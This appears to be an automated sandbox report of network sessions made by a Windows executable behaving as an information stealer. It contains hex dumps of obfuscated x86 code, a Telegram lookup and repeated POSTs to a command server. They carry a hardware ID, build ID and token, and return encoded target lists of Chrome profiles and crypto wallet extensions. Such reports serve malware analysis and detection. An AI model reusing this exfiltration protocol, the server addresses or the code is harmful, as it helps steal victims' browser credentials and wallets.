                                                                                                                                                                      2024-12-04 16:04:22 UTC1378INData Raw: 07 32 51 20 88 50 07 0f b6 51 08 32 51 21 88 50 08 c6 05 ff ac 46 00 01 c3 cc cc cc 55 53 57 56 83 ec 08 8b 5c 24 1c 8b 6c 24 20 c7 44 24 04 ff 00 00 00 a1 b0 cb 45 00 8b b0 60 9e 0f 4b a1 b4 cb 45 00 ff 90 60 9e 0f 4b 31 ff 68 04 01 00 00 57 50 ff d6 89 c6 a1 b8 cb 45 00 89 e1 51 68 19 01 02 00 57 55 53 ff 90 60 9e 0f 4b 31 c9 85 c0 0f 95 c1 a1 bc cb 45 00 ba db 25 26 cd 03 94 88 60 9e 0f 4b ff e2 a1 c0 cb 45 00 8d 4c 24 04 51 56 57 57 ff 74 24 34 ff 74 24 14 ff 90 60 9e 0f 4b a1 c4 cb 45 00 ff 34 24 ff 90 60 9e 0f 4b 89 f0 83 c4 08 5e 5f 5b 5d c2 0c 00 55 89 e5 53 57 56 81 ec 54 04 00 00 8d 9d a0 fb ff ff 68 e8 03 00 00 6a 00 53 e8 ae 92 04 00 83 c4 0c a1 d0 cb 45 00 8b 80 1c f8 1a a6 89 45 f0 a1 d4 cb 45 00 be d1 52 71 f3 8b 80 1c f8 1a a6 01 f0 b9 f8
                                                                                                                                                                      Data Ascii: 2Q PQ2Q!PFUSWV\$l$ D$E`KE`K1hWPEQhWUS`K1E%&`KEL$QVWWt$4t$`KE4$`K^_[]USWVThjSEEERq
                                                                                                                                                                      2024-12-04 16:04:22 UTC1378INData Raw: 8d 4e 2c 8d 47 2c 8b 15 0c cc 45 00 03 9a a6 06 30 4f 50 ff d3 0f 10 47 38 0f 10 4f 48 0f 11 46 38 0f 11 4e 48 0f 10 47 58 0f 11 46 58 89 f0 5e 5f 5b c2 04 00 cc 57 56 89 ce 83 c1 2c a1 10 cc 45 00 bf aa 2e cf 6a 8b 80 54 04 99 c4 01 f8 ff d0 8d 4e 18 a1 10 cc 45 00 8b 80 54 04 99 c4 01 f8 ff d0 8d 4e 0c a1 10 cc 45 00 8b 80 54 04 99 c4 01 f8 ff d0 a1 10 cc 45 00 ba aa 2e cf 6a 03 90 54 04 99 c4 89 f1 5e 5f ff e2 55 89 e5 53 57 56 81 ec 2c 03 00 00 8d 5d 20 a1 20 cc 45 00 be 07 26 05 59 8b 80 3f 62 fc 4c 01 f0 bf 0c a6 45 00 8d 4d 98 57 ff d0 a1 20 cc 45 00 8b 80 3f 62 fc 4c 01 f0 8d 4d 88 57 ff d0 8b 43 78 83 f8 02 0f 84 a4 00 00 00 83 f8 01 0f 84 44 02 00 00 85 c0 0f 85 03 01 00 00 a1 20 cc 45 00 8b 80 43 62 fc 4c 01 f0 8d 8d 08 fe ff ff 6a 1c 51 ff d0
                                                                                                                                                                      Data Ascii: N,G,E0OPG8OHF8NHGXFX^_[WV,E.jTNETNETE.jT^_USWV,] E&Y?bLEMW E?bLMWCxD ECbLjQ
                                                                                                                                                                      2024-12-04 16:04:22 UTC1378INData Raw: b9 40 00 00 00 0f 44 c8 a1 28 cc 45 00 8b 84 08 3f 62 fc 4c b9 40 48 d5 1b 01 c8 ff e0 a1 3c cc 45 00 8b 98 3f 62 fc 4c a1 20 cc 45 00 bf 07 26 05 59 8b 80 67 62 fc 4c 01 f8 b9 92 69 fc 4c 03 0d 2c cc 45 00 be b6 ad 46 00 51 56 ff d0 83 c4 08 56 8d 85 f4 fc ff ff 50 ff d3 85 c0 b8 14 00 00 00 b9 58 00 00 00 0f 44 c8 a1 28 cc 45 00 bb 40 48 d5 1b 8b 84 08 3f 62 fc 4c 01 d8 ff e0 a1 20 cc 45 00 03 b8 3f 62 fc 4c 8d 4d b4 68 0c a6 45 00 ff d7 8d 75 08 83 7e 24 00 b8 48 00 00 00 b9 60 00 00 00 0f 44 c8 a1 28 cc 45 00 03 9c 08 3f 62 fc 4c ff e3 a1 20 cc 45 00 be 07 26 05 59 8b 80 47 62 fc 4c 01 f0 8d bd 7c ff ff ff 8d 4d b4 8d 55 98 52 57 ff d0 a1 20 cc 45 00 8b 80 53 62 fc 4c 01 f0 ba ea 68 fc 4c 8b 0d 2c cc 45 00 01 d1 bb aa ad 46 00 51 53 ff d0 83 c4 08 a1
                                                                                                                                                                      Data Ascii: @D(E?bL@H<E?bL E&YgbLiL,EFQVVPXD(E@H?bL E?bLMhEu~$H`D(E?bL E&YGbL|MURW ESbLhL,EFQS
                                                                                                                                                                      2024-12-04 16:04:22 UTC1378INData Raw: 01 d8 89 f9 ff d0 a1 20 cc 45 00 8b 80 4f 62 fc 4c 01 d8 8d 4d a4 ff d0 a1 20 cc 45 00 8b 80 4f 62 fc 4c 01 d8 8d 8d 7c ff ff ff ff d0 a1 20 cc 45 00 8b 80 4f 62 fc 4c 01 d8 8d 8d 54 ff ff ff ff d0 a1 50 cc 45 00 8b b8 3f 62 fc 4c a1 20 cc 45 00 8b 80 5f 62 fc 4c 01 d8 8d 4d c4 ff d0 89 c6 a1 20 cc 45 00 8b 80 5f 62 fc 4c 01 d8 8d 4d b4 ff d0 6a 01 56 50 ff d7 89 e7 83 ec 14 89 e6 a1 20 cc 45 00 8b 80 6b 62 fc 4c 01 d8 89 f1 8d 55 c4 52 ff d0 8d 45 d0 89 46 0c 8d 45 a4 89 46 10 a1 20 cc 45 00 8b 80 77 62 fc 4c 01 d8 ff d0 89 fc 85 c0 b8 2c 00 00 00 b9 44 00 00 00 0f 44 c8 a1 28 cc 45 00 ba 40 48 d5 1b 03 94 08 3f 62 fc 4c ff e2 89 65 b0 50 83 ec 7c 89 e7 8b 45 a4 89 85 78 ff ff ff 8b 75 d0 8d 4f 6c a1 20 cc 45 00 8b 80 6b 62 fc 4c 01 d8 8d 55 e8 52 ff d0
                                                                                                                                                                      Data Ascii: EObLM EObL| EObLTPE?bL E_bLM E_bLMjVP EkbLUREFEF EwbL,DD(E@H?bLeP|ExuOl EkbLUR
                                                                                                                                                                      2024-12-04 16:04:22 UTC1378INData Raw: d0 a1 4c cc 45 00 8b 0d 20 cc 45 00 8b 91 57 62 fc 4c 01 da 8d 75 a4 89 f9 ff b0 3f 62 fc 4c 56 ff d2 8d 45 08 83 c0 40 8b 0d 20 cc 45 00 8b 91 47 62 fc 4c 01 da 89 f1 50 8d 7d d0 57 ff d2 a1 20 cc 45 00 8b 80 53 62 fc 4c 01 d8 b9 ea 68 fc 4c 03 0d 2c cc 45 00 be aa ad 46 00 51 56 ff d0 83 c4 08 a1 20 cc 45 00 8b 80 57 62 fc 4c 01 d8 89 f9 56 8d 75 c4 56 ff d0 a1 20 cc 45 00 8b 80 73 62 fc 4c 01 d8 8d bd 7c ff ff ff 6a 06 57 ff d0 a1 20 cc 45 00 8b 80 47 62 fc 4c 01 d8 89 f1 57 8d 75 e8 56 ff d0 a1 20 cc 45 00 8b 80 4b 62 fc 4c 01 d8 8d 4d dc 56 ff d0 a1 20 cc 45 00 8b 80 4f 62 fc 4c 01 d8 89 f1 ff d0 a1 20 cc 45 00 8b 80 4f 62 fc 4c 01 d8 89 f9 ff d0 a1 20 cc 45 00 8b 80 4f 62 fc 4c 01 d8 8d 4d c4 ff d0 a1 20 cc 45 00 8b 80 4f 62 fc 4c 01 d8 8d 4d d0 ff
                                                                                                                                                                      Data Ascii: LE EWbLu?bLVE@ EGbLP}W ESbLhL,EFQV EWbLVuV EsbL|jW EGbLWuV EKbLMV EObL EObL EObLM EObLM
                                                                                                                                                                      2024-12-04 16:04:22 UTC1378INData Raw: 06 32 51 20 88 50 06 0f b6 51 07 32 51 21 88 50 07 0f b6 51 08 32 51 22 88 50 08 0f b6 51 09 32 51 23 88 50 09 0f b6 51 0a 32 51 24 88 50 0a 0f b6 51 0b 32 51 25 88 50 0b c6 05 68 ad 46 00 01 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 80 3d 8d ad 46 00 00 75 50 55 53 57 56 8b 74 24 18 8b 7c 24 14 31 c9 bb dc ff ff ff bd 1f 85 eb 51 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 89 c8 41 f7 e5 c1 ea 03 6b c2 e7 8d 14 1e 0f b6 44 10 24 32 44 1e 3d 88 44 1f 24 43 75 e2 c6 05 8d ad 46 00 01 5e 5f 5b 5d c3 cc cc cc cc cc cc 80 3d 94 ad 46 00 00 75 49 8b 4c 24 08 8b 44 24 04 0f b6 11 32 51 15 88 10 0f b6 51 01 32 51 16 88 50 01 0f b6 51 02 32 51 17 88 50 02 0f b6 51 03 32 51 18 88 50 03 0f b6 51 04 32 51 19 88 50 04 0f b6 51 05 32 51 1a 88 50 05 c6 05 94 ad 46 00
                                                                                                                                                                      Data Ascii: 2Q PQ2Q!PQ2Q"PQ2Q#PQ2Q$PQ2Q%PhF=FuPUSWVt$|$1Qf.DAkD$2D=D$CuF^_[]=FuIL$D$2QQ2QPQ2QPQ2QPQ2QPQ2QPF


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      2192.168.2.449738149.154.167.994438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:04:25 UTC85OUTGET /m3wm0w HTTP/1.1
                                                                                                                                                                      Host: t.me
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:04:25 UTC512INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:04:25 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Content-Length: 12292
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: stel_ssid=9256b388006b3be786_11504526215122129733; expires=Thu, 05 Dec 2024 16:04:25 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      Cache-control: no-store
                                                                                                                                                                      X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                      Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                      Strict-Transport-Security: max-age=35768000
                                                                                                                                                                      2024-12-04 16:04:25 UTC12292INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6d 33 77 6d 30 77 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @m3wm0w</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      3192.168.2.449739159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:04:27 UTC224OUTGET / HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:04:28 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:04:28 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:04:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      4192.168.2.449740159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:04:29 UTC316OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----WB1V3OP8YMYM7YMGD2N7
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 256
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:04:29 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 57 42 31 56 33 4f 50 38 59 4d 59 4d 37 59 4d 47 44 32 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 30 35 42 42 35 33 45 43 45 35 39 32 33 39 38 39 38 39 30 30 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 57 42 31 56 33 4f 50 38 59 4d 59 4d 37 59 4d 47 44 32 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 57 42 31 56 33 4f 50 38 59 4d 59 4d 37 59 4d 47 44 32 4e 37 2d 2d 0d
                                                                                                                                                                      Data Ascii: ------WB1V3OP8YMYM7YMGD2N7Content-Disposition: form-data; name="hwid"405BB53ECE592398989009-a33c7340-61ca------WB1V3OP8YMYM7YMGD2N7Content-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------WB1V3OP8YMYM7YMGD2N7--
                                                                                                                                                                      2024-12-04 16:04:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:04:30 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:04:30 UTC70INData Raw: 33 62 0d 0a 31 7c 31 7c 31 7c 31 7c 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 7c 31 7c 31 7c 31 7c 30 7c 30 7c 31 30 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 3b1|1|1|1|6aeb446e65e3de6e8bd63f79e11152e9|1|1|1|0|0|100000|10


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      5192.168.2.449741159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:04:32 UTC316OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----RIMOH4WLXBIMYMG4OHVS
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:04:32 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 52 49 4d 4f 48 34 57 4c 58 42 49 4d 59 4d 47 34 4f 48 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 52 49 4d 4f 48 34 57 4c 58 42 49 4d 59 4d 47 34 4f 48 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 52 49 4d 4f 48 34 57 4c 58 42 49 4d 59 4d 47 34 4f 48 56 53 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------RIMOH4WLXBIMYMG4OHVSContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------RIMOH4WLXBIMYMG4OHVSContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------RIMOH4WLXBIMYMG4OHVSCont
                                                                                                                                                                      2024-12-04 16:04:33 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:04:32 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:04:33 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                      Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      6192.168.2.449742159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:04:34 UTC316OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----00HVS2NY5XBAAA1NG4OZ
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:04:34 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 30 30 48 56 53 32 4e 59 35 58 42 41 41 41 31 4e 47 34 4f 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 30 30 48 56 53 32 4e 59 35 58 42 41 41 41 31 4e 47 34 4f 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 30 30 48 56 53 32 4e 59 35 58 42 41 41 41 31 4e 47 34 4f 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------00HVS2NY5XBAAA1NG4OZContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------00HVS2NY5XBAAA1NG4OZContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------00HVS2NY5XBAAA1NG4OZCont
                                                                                                                                                                      2024-12-04 16:04:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:04:35 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:04:35 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                      Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      7192.168.2.449743159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:04:36 UTC316OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----TJMY5FKXBA1N7YM79ZMO
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 332
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:04:36 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 54 4a 4d 59 35 46 4b 58 42 41 31 4e 37 59 4d 37 39 5a 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 54 4a 4d 59 35 46 4b 58 42 41 31 4e 37 59 4d 37 39 5a 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 54 4a 4d 59 35 46 4b 58 42 41 31 4e 37 59 4d 37 39 5a 4d 4f 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------TJMY5FKXBA1N7YM79ZMOContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------TJMY5FKXBA1N7YM79ZMOContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------TJMY5FKXBA1N7YM79ZMOCont
                                                                                                                                                                      2024-12-04 16:04:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:04:37 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:04:37 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      8192.168.2.449744159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:04:39 UTC317OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----MOP8G4OPZ58YUAA1D26P
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 6837
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
